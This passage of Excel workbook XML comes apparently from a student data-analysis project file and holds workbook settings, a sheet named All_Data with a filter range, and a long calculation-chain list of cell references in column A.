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lvar\OneDrive\Documents\NJIT\MGMT635_DataAnalysis\Data_raw\Processed\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{524FEB5D-BBD8-456A-ACC2-E5996F83C8EA}" xr6:coauthVersionLast="44" xr6:coauthVersionMax="44" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10560" xr2:uid="{AF7C0EFA-3FF8-4235-BEB2-34C4B87F73A7}"/>
  </bookViews>
  <sheets>
    <sheet name="All_Data" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">All_Data!$A$1:$G$20001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0001" i="1" l="1"/>
  <c r="A20000" i="1"/>
  <c r="A19999" i="1"/>
  <c r="A19998" i="1"/>
  <c r="A19997" i="1"/>
  <c r="A19996" i="1"/>
  <c r="A19995" i="1"/>
  <c r="A19994" i="1"/>
  <c r="A19993" i="1"/>
  <c r="A19992" i="1"/>
  <c r="A19991" i="1"/>
  <c r="A19990" i="1"/>
  <c r="A19989" i="1"/>
  <c r="A19988" i="1"/>
  <c r="A19987" i="1"/>
  <c r="A19986" i="1"/>
  <c r="A19985" i="1"/>
  <c r="A19984" i="1"/>
  <c r="A19983" i="1"/>
  <c r="A19982" i="1"/>
  <c r="A19981" i="1"/>
  <c r="A19980" i="1"/>
  <c r="A19979" i="1"/>
  <c r="A19978" i="1"/>
  <c r="A19977" i="1"/>
  <c r="A19976" i="1"/>
  <c r="A19975" i="1"/>
  <c r="A19974" i="1"/>
  <c r="A19973" i="1"/>
  <c r="A19972" i="1"/>
  <c r="A19971" i="1"/>
  <c r="A19970" i="1"/>
  <c r="A19969" i="1"/>
  <c r="A19968" i="1"/>
  <c r="A19967" i="1"/>
  <c r="A19966" i="1"/>
  <c r="A19965" i="1"/>
  <c r="A19964" i="1"/>
  <c r="A19963" i="1"/>
  <c r="A19962" i="1"/>
  <c r="A19961" i="1"/>
  <c r="A19960" i="1"/>
  <c r="A19959" i="1"/>
  <c r="A19958" i="1"/>
  <c r="A19957" i="1"/>
  <c r="A19956" i="1"/>
  <c r="A19955" i="1"/>
  <c r="A19954" i="1"/>
  <c r="A19953" i="1"/>
  <c r="A19952" i="1"/>
  <c r="A19951" i="1"/>
  <c r="A19950" i="1"/>
  <c r="A19949" i="1"/>
  <c r="A19948" i="1"/>
  <c r="A19947" i="1"/>
  <c r="A19946" i="1"/>
  <c r="A19945" i="1"/>
  <c r="A19944" i="1"/>
  <c r="A19943" i="1"/>
  <c r="A19942" i="1"/>
  <c r="A19941" i="1"/>
  <c r="A19940" i="1"/>
  <c r="A19939" i="1"/>
  <c r="A19938" i="1"/>
  <c r="A19937" i="1"/>
  <c r="A19936" i="1"/>
  <c r="A19935" i="1"/>
  <c r="A19934" i="1"/>
  <c r="A19933" i="1"/>
  <c r="A19932" i="1"/>
  <c r="A19931" i="1"/>
  <c r="A19930" i="1"/>
  <c r="A19929" i="1"/>
  <c r="A19928" i="1"/>
  <c r="A19927" i="1"/>
  <c r="A19926" i="1"/>
  <c r="A19925" i="1"/>
  <c r="A19924" i="1"/>
  <c r="A19923" i="1"/>
  <c r="A19922" i="1"/>
  <c r="A19921" i="1"/>
  <c r="A19920" i="1"/>
  <c r="A19919" i="1"/>
  <c r="A19918" i="1"/>
  <c r="A19917" i="1"/>
  <c r="A19916" i="1"/>
  <c r="A19915" i="1"/>
  <c r="A19914" i="1"/>
  <c r="A19913" i="1"/>
  <c r="A19912" i="1"/>
  <c r="A19911" i="1"/>
  <c r="A19910" i="1"/>
  <c r="A19909" i="1"/>
  <c r="A19908" i="1"/>
  <c r="A19907" i="1"/>
  <c r="A19906" i="1"/>
  <c r="A19905" i="1"/>
  <c r="A19904" i="1"/>
  <c r="A19903" i="1"/>
  <c r="A19902" i="1"/>
  <c r="A19901" i="1"/>
  <c r="A19900" i="1"/>
  <c r="A19899" i="1"/>
  <c r="A19898" i="1"/>
  <c r="A19897" i="1"/>
  <c r="A19896" i="1"/>
  <c r="A19895" i="1"/>
  <c r="A19894" i="1"/>
  <c r="A19893" i="1"/>
  <c r="A19892" i="1"/>
  <c r="A19891" i="1"/>
  <c r="A19890" i="1"/>
  <c r="A19889" i="1"/>
  <c r="A19888" i="1"/>
  <c r="A19887" i="1"/>
  <c r="A19886" i="1"/>
  <c r="A19885" i="1"/>
  <c r="A19884" i="1"/>
  <c r="A19883" i="1"/>
  <c r="A19882" i="1"/>
  <c r="A19881" i="1"/>
  <c r="A19880" i="1"/>
  <c r="A19879" i="1"/>
  <c r="A19878" i="1"/>
  <c r="A19877" i="1"/>
  <c r="A19876" i="1"/>
  <c r="A19875" i="1"/>
  <c r="A19874" i="1"/>
  <c r="A19873" i="1"/>
  <c r="A19872" i="1"/>
  <c r="A19871" i="1"/>
  <c r="A19870" i="1"/>
  <c r="A19869" i="1"/>
  <c r="A19868" i="1"/>
  <c r="A19867" i="1"/>
  <c r="A19866" i="1"/>
  <c r="A19865" i="1"/>
  <c r="A19864" i="1"/>
  <c r="A19863" i="1"/>
  <c r="A19862" i="1"/>
  <c r="A19861" i="1"/>
  <c r="A19860" i="1"/>
  <c r="A19859" i="1"/>
  <c r="A19858" i="1"/>
  <c r="A19857" i="1"/>
  <c r="A19856" i="1"/>
  <c r="A19855" i="1"/>
  <c r="A19854" i="1"/>
  <c r="A19853" i="1"/>
  <c r="A19852" i="1"/>
  <c r="A19851" i="1"/>
  <c r="A19850" i="1"/>
  <c r="A19849" i="1"/>
  <c r="A19848" i="1"/>
  <c r="A19847" i="1"/>
  <c r="A19846" i="1"/>
  <c r="A19845" i="1"/>
  <c r="A19844" i="1"/>
  <c r="A19843" i="1"/>
  <c r="A19842" i="1"/>
  <c r="A19841" i="1"/>
  <c r="A19840" i="1"/>
  <c r="A19839" i="1"/>
  <c r="A19838" i="1"/>
  <c r="A19837" i="1"/>
  <c r="A19836" i="1"/>
  <c r="A19835" i="1"/>
  <c r="A19834" i="1"/>
  <c r="A19833" i="1"/>
  <c r="A19832" i="1"/>
  <c r="A19831" i="1"/>
  <c r="A19830" i="1"/>
  <c r="A19829" i="1"/>
  <c r="A19828" i="1"/>
  <c r="A19827" i="1"/>
  <c r="A19826" i="1"/>
  <c r="A19825" i="1"/>
  <c r="A19824" i="1"/>
  <c r="A19823" i="1"/>
  <c r="A19822" i="1"/>
  <c r="A19821" i="1"/>
  <c r="A19820" i="1"/>
  <c r="A19819" i="1"/>
  <c r="A19818" i="1"/>
  <c r="A19817" i="1"/>
  <c r="A19816" i="1"/>
  <c r="A19815" i="1"/>
  <c r="A19814" i="1"/>
  <c r="A19813" i="1"/>
  <c r="A19812" i="1"/>
  <c r="A19811" i="1"/>
  <c r="A19810" i="1"/>
  <c r="A19809" i="1"/>
  <c r="A19808" i="1"/>
  <c r="A19807" i="1"/>
  <c r="A19806" i="1"/>
  <c r="A19805" i="1"/>
  <c r="A19804" i="1"/>
  <c r="A19803" i="1"/>
  <c r="A19802" i="1"/>
  <c r="A19801" i="1"/>
  <c r="A19800" i="1"/>
  <c r="A19799" i="1"/>
  <c r="A19798" i="1"/>
  <c r="A19797" i="1"/>
  <c r="A19796" i="1"/>
  <c r="A19795" i="1"/>
  <c r="A19794" i="1"/>
  <c r="A19793" i="1"/>
  <c r="A19792" i="1"/>
  <c r="A19791" i="1"/>
  <c r="A19790" i="1"/>
  <c r="A19789" i="1"/>
  <c r="A19788" i="1"/>
  <c r="A19787" i="1"/>
  <c r="A19786" i="1"/>
  <c r="A19785" i="1"/>
  <c r="A19784" i="1"/>
  <c r="A19783" i="1"/>
  <c r="A19782" i="1"/>
  <c r="A19781" i="1"/>
  <c r="A19780" i="1"/>
  <c r="A19779" i="1"/>
  <c r="A19778" i="1"/>
  <c r="A19777" i="1"/>
  <c r="A19776" i="1"/>
  <c r="A19775" i="1"/>
  <c r="A19774" i="1"/>
  <c r="A19773" i="1"/>
  <c r="A19772" i="1"/>
  <c r="A19771" i="1"/>
  <c r="A19770" i="1"/>
  <c r="A19769" i="1"/>
  <c r="A19768" i="1"/>
  <c r="A19767" i="1"/>
  <c r="A19766" i="1"/>
  <c r="A19765" i="1"/>
  <c r="A19764" i="1"/>
  <c r="A19763" i="1"/>
  <c r="A19762" i="1"/>
  <c r="A19761" i="1"/>
  <c r="A19760" i="1"/>
  <c r="A19759" i="1"/>
  <c r="A19758" i="1"/>
  <c r="A19757" i="1"/>
  <c r="A19756" i="1"/>
  <c r="A19755" i="1"/>
  <c r="A19754" i="1"/>
  <c r="A19753" i="1"/>
  <c r="A19752" i="1"/>
  <c r="A19751" i="1"/>
  <c r="A19750" i="1"/>
  <c r="A19749" i="1"/>
  <c r="A19748" i="1"/>
  <c r="A19747" i="1"/>
  <c r="A19746" i="1"/>
  <c r="A19745" i="1"/>
  <c r="A19744" i="1"/>
  <c r="A19743" i="1"/>
  <c r="A19742" i="1"/>
  <c r="A19741" i="1"/>
  <c r="A19740" i="1"/>
  <c r="A19739" i="1"/>
  <c r="A19738" i="1"/>
  <c r="A19737" i="1"/>
  <c r="A19736" i="1"/>
  <c r="A19735" i="1"/>
  <c r="A19734" i="1"/>
  <c r="A19733" i="1"/>
  <c r="A19732" i="1"/>
  <c r="A19731" i="1"/>
  <c r="A19730" i="1"/>
  <c r="A19729" i="1"/>
  <c r="A19728" i="1"/>
  <c r="A19727" i="1"/>
  <c r="A19726" i="1"/>
  <c r="A19725" i="1"/>
  <c r="A19724" i="1"/>
  <c r="A19723" i="1"/>
  <c r="A19722" i="1"/>
  <c r="A19721" i="1"/>
  <c r="A19720" i="1"/>
  <c r="A19719" i="1"/>
  <c r="A19718" i="1"/>
  <c r="A19717" i="1"/>
  <c r="A19716" i="1"/>
  <c r="A19715" i="1"/>
  <c r="A19714" i="1"/>
  <c r="A19713" i="1"/>
  <c r="A19712" i="1"/>
  <c r="A19711" i="1"/>
  <c r="A19710" i="1"/>
  <c r="A19709" i="1"/>
  <c r="A19708" i="1"/>
  <c r="A19707" i="1"/>
  <c r="A19706" i="1"/>
  <c r="A19705" i="1"/>
  <c r="A19704" i="1"/>
  <c r="A19703" i="1"/>
  <c r="A19702" i="1"/>
  <c r="A19701" i="1"/>
  <c r="A19700" i="1"/>
  <c r="A19699" i="1"/>
  <c r="A19698" i="1"/>
  <c r="A19697" i="1"/>
  <c r="A19696" i="1"/>
  <c r="A19695" i="1"/>
  <c r="A19694" i="1"/>
  <c r="A19693" i="1"/>
  <c r="A19692" i="1"/>
  <c r="A19691" i="1"/>
  <c r="A19690" i="1"/>
  <c r="A19689" i="1"/>
  <c r="A19688" i="1"/>
  <c r="A19687" i="1"/>
  <c r="A19686" i="1"/>
  <c r="A19685" i="1"/>
  <c r="A19684" i="1"/>
  <c r="A19683" i="1"/>
  <c r="A19682" i="1"/>
  <c r="A19681" i="1"/>
  <c r="A19680" i="1"/>
  <c r="A19679" i="1"/>
  <c r="A19678" i="1"/>
  <c r="A19677" i="1"/>
  <c r="A19676" i="1"/>
  <c r="A19675" i="1"/>
  <c r="A19674" i="1"/>
  <c r="A19673" i="1"/>
  <c r="A19672" i="1"/>
  <c r="A19671" i="1"/>
  <c r="A19670" i="1"/>
  <c r="A19669" i="1"/>
  <c r="A19668" i="1"/>
  <c r="A19667" i="1"/>
  <c r="A19666" i="1"/>
  <c r="A19665" i="1"/>
  <c r="A19664" i="1"/>
  <c r="A19663" i="1"/>
  <c r="A19662" i="1"/>
  <c r="A19661" i="1"/>
  <c r="A19660" i="1"/>
  <c r="A19659" i="1"/>
  <c r="A19658" i="1"/>
  <c r="A19657" i="1"/>
  <c r="A19656" i="1"/>
  <c r="A19655" i="1"/>
  <c r="A19654" i="1"/>
  <c r="A19653" i="1"/>
  <c r="A19652" i="1"/>
  <c r="A19651" i="1"/>
  <c r="A19650" i="1"/>
  <c r="A19649" i="1"/>
  <c r="A19648" i="1"/>
  <c r="A19647" i="1"/>
  <c r="A19646" i="1"/>
  <c r="A19645" i="1"/>
  <c r="A19644" i="1"/>
  <c r="A19643" i="1"/>
  <c r="A19642" i="1"/>
  <c r="A19641" i="1"/>
  <c r="A19640" i="1"/>
  <c r="A19639" i="1"/>
  <c r="A19638" i="1"/>
  <c r="A19637" i="1"/>
  <c r="A19636" i="1"/>
  <c r="A19635" i="1"/>
  <c r="A19634" i="1"/>
  <c r="A19633" i="1"/>
  <c r="A19632" i="1"/>
  <c r="A19631" i="1"/>
  <c r="A19630" i="1"/>
  <c r="A19629" i="1"/>
  <c r="A19628" i="1"/>
  <c r="A19627" i="1"/>
  <c r="A19626" i="1"/>
  <c r="A19625" i="1"/>
  <c r="A19624" i="1"/>
  <c r="A19623" i="1"/>
  <c r="A19622" i="1"/>
  <c r="A19621" i="1"/>
  <c r="A19620" i="1"/>
  <c r="A19619" i="1"/>
  <c r="A19618" i="1"/>
  <c r="A19617" i="1"/>
  <c r="A19616" i="1"/>
  <c r="A19615" i="1"/>
  <c r="A19614" i="1"/>
  <c r="A19613" i="1"/>
  <c r="A19612" i="1"/>
  <c r="A19611" i="1"/>
  <c r="A19610" i="1"/>
  <c r="A19609" i="1"/>
  <c r="A19608" i="1"/>
  <c r="A19607" i="1"/>
  <c r="A19606" i="1"/>
  <c r="A19605" i="1"/>
  <c r="A19604" i="1"/>
  <c r="A19603" i="1"/>
  <c r="A19602" i="1"/>
  <c r="A19601" i="1"/>
  <c r="A19600" i="1"/>
  <c r="A19599" i="1"/>
  <c r="A19598" i="1"/>
  <c r="A19597" i="1"/>
  <c r="A19596" i="1"/>
  <c r="A19595" i="1"/>
  <c r="A19594" i="1"/>
  <c r="A19593" i="1"/>
  <c r="A19592" i="1"/>
  <c r="A19591" i="1"/>
  <c r="A19590" i="1"/>
  <c r="A19589" i="1"/>
  <c r="A19588" i="1"/>
  <c r="A19587" i="1"/>
  <c r="A19586" i="1"/>
  <c r="A19585" i="1"/>
  <c r="A19584" i="1"/>
  <c r="A19583" i="1"/>
  <c r="A19582" i="1"/>
  <c r="A19581" i="1"/>
  <c r="A19580" i="1"/>
  <c r="A19579" i="1"/>
  <c r="A19578" i="1"/>
  <c r="A19577" i="1"/>
  <c r="A19576" i="1"/>
  <c r="A19575" i="1"/>
  <c r="A19574" i="1"/>
  <c r="A19573" i="1"/>
  <c r="A19572" i="1"/>
  <c r="A19571" i="1"/>
  <c r="A19570" i="1"/>
  <c r="A19569" i="1"/>
  <c r="A19568" i="1"/>
  <c r="A19567" i="1"/>
  <c r="A19566" i="1"/>
  <c r="A19565" i="1"/>
  <c r="A19564" i="1"/>
  <c r="A19563" i="1"/>
  <c r="A19562" i="1"/>
  <c r="A19561" i="1"/>
  <c r="A19560" i="1"/>
  <c r="A19559" i="1"/>
  <c r="A19558" i="1"/>
  <c r="A19557" i="1"/>
  <c r="A19556" i="1"/>
  <c r="A19555" i="1"/>
  <c r="A19554" i="1"/>
  <c r="A19553" i="1"/>
  <c r="A19552" i="1"/>
  <c r="A19551" i="1"/>
  <c r="A19550" i="1"/>
  <c r="A19549" i="1"/>
  <c r="A19548" i="1"/>
  <c r="A19547" i="1"/>
  <c r="A19546" i="1"/>
  <c r="A19545" i="1"/>
  <c r="A19544" i="1"/>
  <c r="A19543" i="1"/>
  <c r="A19542" i="1"/>
  <c r="A19541" i="1"/>
  <c r="A19540" i="1"/>
  <c r="A19539" i="1"/>
  <c r="A19538" i="1"/>
  <c r="A19537" i="1"/>
  <c r="A19536" i="1"/>
  <c r="A19535" i="1"/>
  <c r="A19534" i="1"/>
  <c r="A19533" i="1"/>
  <c r="A19532" i="1"/>
  <c r="A19531" i="1"/>
  <c r="A19530" i="1"/>
  <c r="A19529" i="1"/>
  <c r="A19528" i="1"/>
  <c r="A19527" i="1"/>
  <c r="A19526" i="1"/>
  <c r="A19525" i="1"/>
  <c r="A19524" i="1"/>
  <c r="A19523" i="1"/>
  <c r="A19522" i="1"/>
  <c r="A19521" i="1"/>
  <c r="A19520" i="1"/>
  <c r="A19519" i="1"/>
  <c r="A19518" i="1"/>
  <c r="A19517" i="1"/>
  <c r="A19516" i="1"/>
  <c r="A19515" i="1"/>
  <c r="A19514" i="1"/>
  <c r="A19513" i="1"/>
  <c r="A19512" i="1"/>
  <c r="A19511" i="1"/>
  <c r="A19510" i="1"/>
  <c r="A19509" i="1"/>
  <c r="A19508" i="1"/>
  <c r="A19507" i="1"/>
  <c r="A19506" i="1"/>
  <c r="A19505" i="1"/>
  <c r="A19504" i="1"/>
  <c r="A19503" i="1"/>
  <c r="A19502" i="1"/>
  <c r="A19501" i="1"/>
  <c r="A19500" i="1"/>
  <c r="A19499" i="1"/>
  <c r="A19498" i="1"/>
  <c r="A19497" i="1"/>
  <c r="A19496" i="1"/>
  <c r="A19495" i="1"/>
  <c r="A19494" i="1"/>
  <c r="A19493" i="1"/>
  <c r="A19492" i="1"/>
  <c r="A19491" i="1"/>
  <c r="A19490" i="1"/>
  <c r="A19489" i="1"/>
  <c r="A19488" i="1"/>
  <c r="A19487" i="1"/>
  <c r="A19486" i="1"/>
  <c r="A19485" i="1"/>
  <c r="A19484" i="1"/>
  <c r="A19483" i="1"/>
  <c r="A19482" i="1"/>
  <c r="A19481" i="1"/>
  <c r="A19480" i="1"/>
  <c r="A19479" i="1"/>
  <c r="A19478" i="1"/>
  <c r="A19477" i="1"/>
  <c r="A19476" i="1"/>
  <c r="A19475" i="1"/>
  <c r="A19474" i="1"/>
  <c r="A19473" i="1"/>
  <c r="A19472" i="1"/>
  <c r="A19471" i="1"/>
  <c r="A19470" i="1"/>
  <c r="A19469" i="1"/>
  <c r="A19468" i="1"/>
  <c r="A19467" i="1"/>
  <c r="A19466" i="1"/>
  <c r="A19465" i="1"/>
  <c r="A19464" i="1"/>
  <c r="A19463" i="1"/>
  <c r="A19462" i="1"/>
  <c r="A19461" i="1"/>
  <c r="A19460" i="1"/>
  <c r="A19459" i="1"/>
  <c r="A19458" i="1"/>
  <c r="A19457" i="1"/>
  <c r="A19456" i="1"/>
  <c r="A19455" i="1"/>
  <c r="A19454" i="1"/>
  <c r="A19453" i="1"/>
  <c r="A19452" i="1"/>
  <c r="A19451" i="1"/>
  <c r="A19450" i="1"/>
  <c r="A19449" i="1"/>
  <c r="A19448" i="1"/>
  <c r="A19447" i="1"/>
  <c r="A19446" i="1"/>
  <c r="A19445" i="1"/>
  <c r="A19444" i="1"/>
  <c r="A19443" i="1"/>
  <c r="A19442" i="1"/>
  <c r="A19441" i="1"/>
  <c r="A19440" i="1"/>
  <c r="A19439" i="1"/>
  <c r="A19438" i="1"/>
  <c r="A19437" i="1"/>
  <c r="A19436" i="1"/>
  <c r="A19435" i="1"/>
  <c r="A19434" i="1"/>
  <c r="A19433" i="1"/>
  <c r="A19432" i="1"/>
  <c r="A19431" i="1"/>
  <c r="A19430" i="1"/>
  <c r="A19429" i="1"/>
  <c r="A19428" i="1"/>
  <c r="A19427" i="1"/>
  <c r="A19426" i="1"/>
  <c r="A19425" i="1"/>
  <c r="A19424" i="1"/>
  <c r="A19423" i="1"/>
  <c r="A19422" i="1"/>
  <c r="A19421" i="1"/>
  <c r="A19420" i="1"/>
  <c r="A19419" i="1"/>
  <c r="A19418" i="1"/>
  <c r="A19417" i="1"/>
  <c r="A19416" i="1"/>
  <c r="A19415" i="1"/>
  <c r="A19414" i="1"/>
  <c r="A19413" i="1"/>
  <c r="A19412" i="1"/>
  <c r="A19411" i="1"/>
  <c r="A19410" i="1"/>
  <c r="A19409" i="1"/>
  <c r="A19408" i="1"/>
  <c r="A19407" i="1"/>
  <c r="A19406" i="1"/>
  <c r="A19405" i="1"/>
  <c r="A19404" i="1"/>
  <c r="A19403" i="1"/>
  <c r="A19402" i="1"/>
  <c r="A19401" i="1"/>
  <c r="A19400" i="1"/>
  <c r="A19399" i="1"/>
  <c r="A19398" i="1"/>
  <c r="A19397" i="1"/>
  <c r="A19396" i="1"/>
  <c r="A19395" i="1"/>
  <c r="A19394" i="1"/>
  <c r="A19393" i="1"/>
  <c r="A19392" i="1"/>
  <c r="A19391" i="1"/>
  <c r="A19390" i="1"/>
  <c r="A19389" i="1"/>
  <c r="A19388" i="1"/>
  <c r="A19387" i="1"/>
  <c r="A19386" i="1"/>
  <c r="A19385" i="1"/>
  <c r="A19384" i="1"/>
  <c r="A19383" i="1"/>
  <c r="A19382" i="1"/>
  <c r="A19381" i="1"/>
  <c r="A19380" i="1"/>
  <c r="A19379" i="1"/>
  <c r="A19378" i="1"/>
  <c r="A19377" i="1"/>
  <c r="A19376" i="1"/>
  <c r="A19375" i="1"/>
  <c r="A19374" i="1"/>
  <c r="A19373" i="1"/>
  <c r="A19372" i="1"/>
  <c r="A19371" i="1"/>
  <c r="A19370" i="1"/>
  <c r="A19369" i="1"/>
  <c r="A19368" i="1"/>
  <c r="A19367" i="1"/>
  <c r="A19366" i="1"/>
  <c r="A19365" i="1"/>
  <c r="A19364" i="1"/>
  <c r="A19363" i="1"/>
  <c r="A19362" i="1"/>
  <c r="A19361" i="1"/>
  <c r="A19360" i="1"/>
  <c r="A19359" i="1"/>
  <c r="A19358" i="1"/>
  <c r="A19357" i="1"/>
  <c r="A19356" i="1"/>
  <c r="A19355" i="1"/>
  <c r="A19354" i="1"/>
  <c r="A19353" i="1"/>
  <c r="A19352" i="1"/>
  <c r="A19351" i="1"/>
  <c r="A19350" i="1"/>
  <c r="A19349" i="1"/>
  <c r="A19348" i="1"/>
  <c r="A19347" i="1"/>
  <c r="A19346" i="1"/>
  <c r="A19345" i="1"/>
  <c r="A19344" i="1"/>
  <c r="A19343" i="1"/>
  <c r="A19342" i="1"/>
  <c r="A19341" i="1"/>
  <c r="A19340" i="1"/>
  <c r="A19339" i="1"/>
  <c r="A19338" i="1"/>
  <c r="A19337" i="1"/>
  <c r="A19336" i="1"/>
  <c r="A19335" i="1"/>
  <c r="A19334" i="1"/>
  <c r="A19333" i="1"/>
  <c r="A19332" i="1"/>
  <c r="A19331" i="1"/>
  <c r="A19330" i="1"/>
  <c r="A19329" i="1"/>
  <c r="A19328" i="1"/>
  <c r="A19327" i="1"/>
  <c r="A19326" i="1"/>
  <c r="A19325" i="1"/>
  <c r="A19324" i="1"/>
  <c r="A19323" i="1"/>
  <c r="A19322" i="1"/>
  <c r="A19321" i="1"/>
  <c r="A19320" i="1"/>
  <c r="A19319" i="1"/>
  <c r="A19318" i="1"/>
  <c r="A19317" i="1"/>
  <c r="A19316" i="1"/>
  <c r="A19315" i="1"/>
  <c r="A19314" i="1"/>
  <c r="A19313" i="1"/>
  <c r="A19312" i="1"/>
  <c r="A19311" i="1"/>
  <c r="A19310" i="1"/>
  <c r="A19309" i="1"/>
  <c r="A19308" i="1"/>
  <c r="A19307" i="1"/>
  <c r="A19306" i="1"/>
  <c r="A19305" i="1"/>
  <c r="A19304" i="1"/>
  <c r="A19303" i="1"/>
  <c r="A19302" i="1"/>
  <c r="A19301" i="1"/>
  <c r="A19300" i="1"/>
  <c r="A19299" i="1"/>
  <c r="A19298" i="1"/>
  <c r="A19297" i="1"/>
  <c r="A19296" i="1"/>
  <c r="A19295" i="1"/>
  <c r="A19294" i="1"/>
  <c r="A19293" i="1"/>
  <c r="A19292" i="1"/>
  <c r="A19291" i="1"/>
  <c r="A19290" i="1"/>
  <c r="A19289" i="1"/>
  <c r="A19288" i="1"/>
  <c r="A19287" i="1"/>
  <c r="A19286" i="1"/>
  <c r="A19285" i="1"/>
  <c r="A19284" i="1"/>
  <c r="A19283" i="1"/>
  <c r="A19282" i="1"/>
  <c r="A19281" i="1"/>
  <c r="A19280" i="1"/>
  <c r="A19279" i="1"/>
  <c r="A19278" i="1"/>
  <c r="A19277" i="1"/>
  <c r="A19276" i="1"/>
  <c r="A19275" i="1"/>
  <c r="A19274" i="1"/>
  <c r="A19273" i="1"/>
  <c r="A19272" i="1"/>
  <c r="A19271" i="1"/>
  <c r="A19270" i="1"/>
  <c r="A19269" i="1"/>
  <c r="A19268" i="1"/>
  <c r="A19267" i="1"/>
  <c r="A19266" i="1"/>
  <c r="A19265" i="1"/>
  <c r="A19264" i="1"/>
  <c r="A19263" i="1"/>
  <c r="A19262" i="1"/>
  <c r="A19261" i="1"/>
  <c r="A19260" i="1"/>
  <c r="A19259" i="1"/>
  <c r="A19258" i="1"/>
  <c r="A19257" i="1"/>
  <c r="A19256" i="1"/>
  <c r="A19255" i="1"/>
  <c r="A19254" i="1"/>
  <c r="A19253" i="1"/>
  <c r="A19252" i="1"/>
  <c r="A19251" i="1"/>
  <c r="A19250" i="1"/>
  <c r="A19249" i="1"/>
  <c r="A19248" i="1"/>
  <c r="A19247" i="1"/>
  <c r="A19246" i="1"/>
  <c r="A19245" i="1"/>
  <c r="A19244" i="1"/>
  <c r="A19243" i="1"/>
  <c r="A19242" i="1"/>
  <c r="A19241" i="1"/>
  <c r="A19240" i="1"/>
  <c r="A19239" i="1"/>
  <c r="A19238" i="1"/>
  <c r="A19237" i="1"/>
  <c r="A19236" i="1"/>
  <c r="A19235" i="1"/>
  <c r="A19234" i="1"/>
  <c r="A19233" i="1"/>
  <c r="A19232" i="1"/>
  <c r="A19231" i="1"/>
  <c r="A19230" i="1"/>
  <c r="A19229" i="1"/>
  <c r="A19228" i="1"/>
  <c r="A19227" i="1"/>
  <c r="A19226" i="1"/>
  <c r="A19225" i="1"/>
  <c r="A19224" i="1"/>
  <c r="A19223" i="1"/>
  <c r="A19222" i="1"/>
  <c r="A19221" i="1"/>
  <c r="A19220" i="1"/>
  <c r="A19219" i="1"/>
  <c r="A19218" i="1"/>
  <c r="A19217" i="1"/>
  <c r="A19216" i="1"/>
  <c r="A19215" i="1"/>
  <c r="A19214" i="1"/>
  <c r="A19213" i="1"/>
  <c r="A19212" i="1"/>
  <c r="A19211" i="1"/>
  <c r="A19210" i="1"/>
  <c r="A19209" i="1"/>
  <c r="A19208" i="1"/>
  <c r="A19207" i="1"/>
  <c r="A19206" i="1"/>
  <c r="A19205" i="1"/>
  <c r="A19204" i="1"/>
  <c r="A19203" i="1"/>
  <c r="A19202" i="1"/>
  <c r="A19201" i="1"/>
  <c r="A19200" i="1"/>
  <c r="A19199" i="1"/>
  <c r="A19198" i="1"/>
  <c r="A19197" i="1"/>
  <c r="A19196" i="1"/>
  <c r="A19195" i="1"/>
  <c r="A19194" i="1"/>
  <c r="A19193" i="1"/>
  <c r="A19192" i="1"/>
  <c r="A19191" i="1"/>
  <c r="A19190" i="1"/>
  <c r="A19189" i="1"/>
  <c r="A19188" i="1"/>
  <c r="A19187" i="1"/>
  <c r="A19186" i="1"/>
  <c r="A19185" i="1"/>
  <c r="A19184" i="1"/>
  <c r="A19183" i="1"/>
  <c r="A19182" i="1"/>
  <c r="A19181" i="1"/>
  <c r="A19180" i="1"/>
  <c r="A19179" i="1"/>
  <c r="A19178" i="1"/>
  <c r="A19177" i="1"/>
  <c r="A19176" i="1"/>
  <c r="A19175" i="1"/>
  <c r="A19174" i="1"/>
  <c r="A19173" i="1"/>
  <c r="A19172" i="1"/>
  <c r="A19171" i="1"/>
  <c r="A19170" i="1"/>
  <c r="A19169" i="1"/>
  <c r="A19168" i="1"/>
  <c r="A19167" i="1"/>
  <c r="A19166" i="1"/>
  <c r="A19165" i="1"/>
  <c r="A19164" i="1"/>
  <c r="A19163" i="1"/>
  <c r="A19162" i="1"/>
  <c r="A19161" i="1"/>
  <c r="A19160" i="1"/>
  <c r="A19159" i="1"/>
  <c r="A19158" i="1"/>
  <c r="A19157" i="1"/>
  <c r="A19156" i="1"/>
  <c r="A19155" i="1"/>
  <c r="A19154" i="1"/>
  <c r="A19153" i="1"/>
  <c r="A19152" i="1"/>
  <c r="A19151" i="1"/>
  <c r="A19150" i="1"/>
  <c r="A19149" i="1"/>
  <c r="A19148" i="1"/>
  <c r="A19147" i="1"/>
  <c r="A19146" i="1"/>
  <c r="A19145" i="1"/>
  <c r="A19144" i="1"/>
  <c r="A19143" i="1"/>
  <c r="A19142" i="1"/>
  <c r="A19141" i="1"/>
  <c r="A19140" i="1"/>
  <c r="A19139" i="1"/>
  <c r="A19138" i="1"/>
  <c r="A19137" i="1"/>
  <c r="A19136" i="1"/>
  <c r="A19135" i="1"/>
  <c r="A19134" i="1"/>
  <c r="A19133" i="1"/>
  <c r="A19132" i="1"/>
  <c r="A19131" i="1"/>
  <c r="A19130" i="1"/>
  <c r="A19129" i="1"/>
  <c r="A19128" i="1"/>
  <c r="A19127" i="1"/>
  <c r="A19126" i="1"/>
  <c r="A19125" i="1"/>
  <c r="A19124" i="1"/>
  <c r="A19123" i="1"/>
  <c r="A19122" i="1"/>
  <c r="A19121" i="1"/>
  <c r="A19120" i="1"/>
  <c r="A19119" i="1"/>
  <c r="A19118" i="1"/>
  <c r="A19117" i="1"/>
  <c r="A19116" i="1"/>
  <c r="A19115" i="1"/>
  <c r="A19114" i="1"/>
  <c r="A19113" i="1"/>
  <c r="A19112" i="1"/>
  <c r="A19111" i="1"/>
  <c r="A19110" i="1"/>
  <c r="A19109" i="1"/>
  <c r="A19108" i="1"/>
  <c r="A19107" i="1"/>
  <c r="A19106" i="1"/>
  <c r="A19105" i="1"/>
  <c r="A19104" i="1"/>
  <c r="A19103" i="1"/>
  <c r="A19102" i="1"/>
  <c r="A19101" i="1"/>
  <c r="A19100" i="1"/>
  <c r="A19099" i="1"/>
  <c r="A19098" i="1"/>
  <c r="A19097" i="1"/>
  <c r="A19096" i="1"/>
  <c r="A19095" i="1"/>
  <c r="A19094" i="1"/>
  <c r="A19093" i="1"/>
  <c r="A19092" i="1"/>
  <c r="A19091" i="1"/>
  <c r="A19090" i="1"/>
